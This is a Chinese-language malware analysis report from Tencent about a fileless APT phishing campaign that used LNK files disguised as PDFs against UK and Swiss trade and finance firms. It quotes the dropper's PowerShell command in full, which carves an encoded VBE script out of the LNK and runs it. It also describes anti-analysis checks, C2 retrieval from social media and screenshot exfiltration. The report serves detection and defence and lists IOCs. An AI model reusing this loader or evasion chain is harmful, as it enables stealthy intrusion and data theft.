一、概述

近日，腾讯御见威胁情报中心在日常的恶意文件运营中，发现了几个可疑的钓鱼lnk（伪装成快捷方式文件的攻击程序）。经过分析发现，这些lnk构造巧妙，全程无PE文件落地（Fileless攻击），并且把解密key和C2存放在了twitter、youtube等社交站点上。

从关联到的样本来看，攻击针对英国、瑞士等欧洲国家，攻击目标为外贸、金融相关企业。暂时还不详具体的攻击者背景，望安全社区同仁一起来完善攻击的拼图。

该APT组织攻击手法的一些特点：

1.诱饵文件为压缩包中伪装成PDF文档的LNK文件（LNK默认是快捷方式，恶意程序执行后会打开一个欺骗性的PDF文件，这个组合极有欺骗性）；

2.攻击过程中，全程无PE文件落地，巧妙避开安全软件的常规检测；

3.攻击程序会判断电脑是否安装网络嗅探工具（wireshark和Nmap，通常为安全研究人员用于网络抓包分析），如果有，就不执行木马核心功能；

4.通过youtube、twitter、Google、wordpress.com的公共空间更新C2，存放解密代码；

5.收集目标计算机名、杀毒软件信息、系统安全时间、系统版本等情报，定时截屏上传；

6.检测是否存在虚拟机等特殊软件。 

二、技术分析

1.攻击诱饵

本次攻击的诱饵是一个zip压缩包，名字为：Dubai_Lawyers_update_2018.zip，压缩报里包含2个lnk文件：

而lnk为攻击者精心构造的恶意lnk，点击运行lnk后，会触发执行包含的恶意代码：

其中，压缩包里的两个lnk的内容类似，我们以其中一个为例进行详细分析。 

2.lnk分析

运行lnk后，执行的恶意代码如下：

Cmd.exe "/c powershell -c "$m='A_Dhabi.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp$m $t\$m;$z=$t+'\'+@(gci -name $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];[io.file]::WriteAllbytes($t+'\.vbe',$q);CsCrIpT$t'\.vbe'"

该命令的主要功能为：

1）将dubai.pdf.lnk文件复制到”%temp%”目录；

2）将lnk文件结尾处往回2340字节的内容，写入“%temp%\.vbe“文件中；

3）利用cscript.exe将vbe给执行起来。

写入的.vbe文件为使用Encoded加密的脚本文件：

解密后内容如下：

3.Vbe脚本分析

先将lnk文件从文件头开始，偏移为2334，大小为136848字节的内容写入“A_Dhabi.pdf”，该文件保存在temp目录，而该文件确实为一个pdf文件。接着打开该pdf文件，让受害者误以为只是简单得打开了一个正常的pdf文件而已：

打开的pdf文件如下：

接着将lnk文件中pdf文件之后的338459字节的内容，写入“%temp%\~.tmpF292.ps1”文件中，该文件为powershell脚本：

最后将接下来的读取位置写入”%temp%\~.tmpF293”文件中，并利用powershell将“~.tmpF292.ps1”文件给执行起来：

4.~.tmpF292.ps1分析

原始的ps1脚本是经过加密后的脚本：

经过解密后，发现两个特殊的明文字符串：

“Lorem Ipsum is simply dummy text of the printing and typesettingindustry. Lorem Ipsum has been the industrys standard dummy text ever since the1500s” 和“when an unknown printer took a galley of typeand scrambled it to make a type specimen book. It has    survived not only fivecenturies but also the leap into electronic typesetting remaining essentiallyunchanged.”

这两个字符串没有参与加密代码的计算，基本上没有任何意义。

而使用搜索引擎搜索该字符后发现，该字符串是为了排版测试的：

加密的代码经过解密，代码逻辑就十分清晰了：

其中， $code = @"到"@部分为powershell里调用的c#方法，后面为powershell脚本命令。

该powershell脚本的主要功能为：

1）使用WMI，检测安全软件，包括AVG、AVAST，若存在，则删除中间文件，然后退出；

2）判断是否有wireshark和Nmap，若存在，则不执行木马核心功能；

3）从~.tmpF293”文件中获取文件偏移，然后从lnk文件中读取信息，然后存入“%temp%\ ~.tmpF291”目录中，涉及到的文件名有~.tmpF222.tmp、~.tmpF295.ico、~.tmpF299.vbe；

4）继续会从lnk中读取第二阶段的payload，并利用网上获取到的key对payload进行解密并执行。若网络不通未拿到key，就将第二阶段的payload以加密状态存储在“%temp%\ ~.tmp.e”文件中；

5）如果“%temp%\ ~.tmp.e”文件存在，会利用从网络上获取的key去解密此文件，得到第二阶段的payload文件“~.tmpF294.ps1”，并执行此文件。

6）获取解密key的url，存储在tmpF222.tmp文件中：

获取到url如下：

https://youtu.be/40rHiF75z5o  

https://brady4th.wordpress.com/2018/11/15/opener/

https://twitter.com/Fancy65716779

https://plus.google.com/u/0/collection/U84ZPF

然后，从这些url中获取相应的解密代码，其中：

“Yobro i sing”字符串开始的位置为stage2 payload的c2；

“My keyboard doesnt work”开始的字符串为解密key：

从文章的发表时间，我们猜测，真正的攻击开始时间发生在11月15日和11月18日。

7）持久性攻击：在startup目录创建快捷方式，快捷方式会cscript.exe将“~.tmpF291“目录 中的” ~.tmpF299.vbe“文件给执行起来，快捷方式图标为” ~.tmpF295.ico“

“~.tmpF299.vbe”解密后内容如下：

5.Stage2（~.tmpF294.ps1）分析

~.tmpF294.ps1为stage2的脚本文件，同样经过了加密，解密后可以发现与真正的c2通信等功能都在此ps脚本中。

1）使用WMI命令收集相关计算机信息，然后以json格式发送给C2：

收集的内容包括计算机名、机器名、杀软信息、系统安装时间、系统版本等。格式中还包含“ace”、“dama”、“king”、“joker”等字样。

2）检测虚拟机等特殊软件：

3）检测wireshark、winpcap、Nmap等特定软件是否安装：

4）从twitter、youtube、google、wordpress等网站更新C2：

5）定时截屏并发送：

6）执行C2下发的powershell脚本：

7）隐藏“%temp%\~.tmpF291”目录，特殊的存储路径“AA36ED3F6A22”为ip存储路径、“E4DAFF315DFA”域名存储路径、“~.tmpF297.tmp”为c2下发的序列号存储路径。

8）根据服务器指定修改定时截屏时的画面质量及频率：

三、关联分析

1.样本拓线：

经过C2的反查，我们又查到找其余几个相同的样本：

Confirm.pdf.lnk，d83f933b2a6c307e17438749eda29f02

Gift-18.pdf.lnk，6f965640bc609f9c5b7fea181a2a83ca

而这两个lnk同样来自于一个zip压缩包：Gift-18.zip

经分析，这两个lnk跟分析的lnk为同一个攻击。而压缩包中还包含了一张图片：

释放的pdf如下：

继续关联，我们又发现了另外2个lnk：

ecamos_Volatility_Strategy_2X.pdf.lnk：540bc05130424301a8f0543e0240df1d

p2_ecamos_Volatility_Strategy_2X.pdf.lnk：38b777dfd5f153609ad6ff8cff1bdedc

运行后，pdf内容如下：

我们猜测，该次攻击对象为瑞士的金融机构和贸易公司。该lnk获取解密key的url为：

https://twitter.com/sabinepfeffer69/status/928607342177988608

https://mads281.wordpress.com

https://www.youtube.com/watch?v=ZRQ-1I856XA

跟上述分析的一致。

2.攻击中的相关元素

1）攻击的某个诱饵pdf来自于英国政府网站：https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/754075/Dubai_List_of_Lawyers_-_Nov_2018.pdf

2）某个诱饵pdf里的图片里的公司的信息：

该图片来自：http://i68.tinypic.com/jtntyd.jpg

3）存放解密信息的博客https://brady4th.wordpress.com中的第一条信息，引用了一句名人的话：

IzaakWalton为一个英国的作家：

4）youtube中的电影：

该电影为一个法国电影，被称为世界上第一部恐怖电影。

5）此外还有不少字符串信息，如dubuk7、dama、AshleyBrady、brady4th、Fancy65716779、Pansy Radon、sabinepfeffer69、mads281、The Obsidian Cloud Casino v1.0等。不过并未搜索和关联到更多的信息。

3.攻击背景

从攻击对象来看，主要是英国、瑞士的相关外贸机构和金融机构。而攻击者角度来看，作者并未留下太多可追溯的确切证据。而从使用lnk钓鱼、fileless攻击的组织来看，似乎APT29更接近，不过暂未发现任何证据指向该组织。因此我们也希望更多安全社区同仁一起合作，来完善该次攻击的拼图。

四、安全建议

1.不要打开不明来源的邮件附件；

2.及时打系统补丁和重要软件的补丁；

3.使用杀毒软件防御可能的病毒木马攻击；

4.使用腾讯御界高级威胁检测系统。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。

五、附录（IOCs）

MD5：

e1718289718792651fa401c945c17079

3b359a0e279c4e8c5b781e0518320b46

6f965640bc609f9c5b7fea181a2a83ca

d83f933b2a6c307e17438749eda29f02

540bc05130424301a8f0543e0240df1d

38b777dfd5f153609ad6ff8cff1bdedc

IP：

54.38.192.174

url：

https://youtu.be/40rHiF75z5o 

https://brady4th.wordpress.com/2018/11/15/opener/

https://twitter.com/Fancy65716779

https://plus.google.com/u/0/collection/U84ZPF

https://twitter.com/sabinepfeffer69/status/928607342177988608

https://mads281.wordpress.com

https://www.youtube.com/watch?v=ZRQ-1I856XA

*本文作者：腾讯电脑管家，转载请注明来自FreeBuf.COM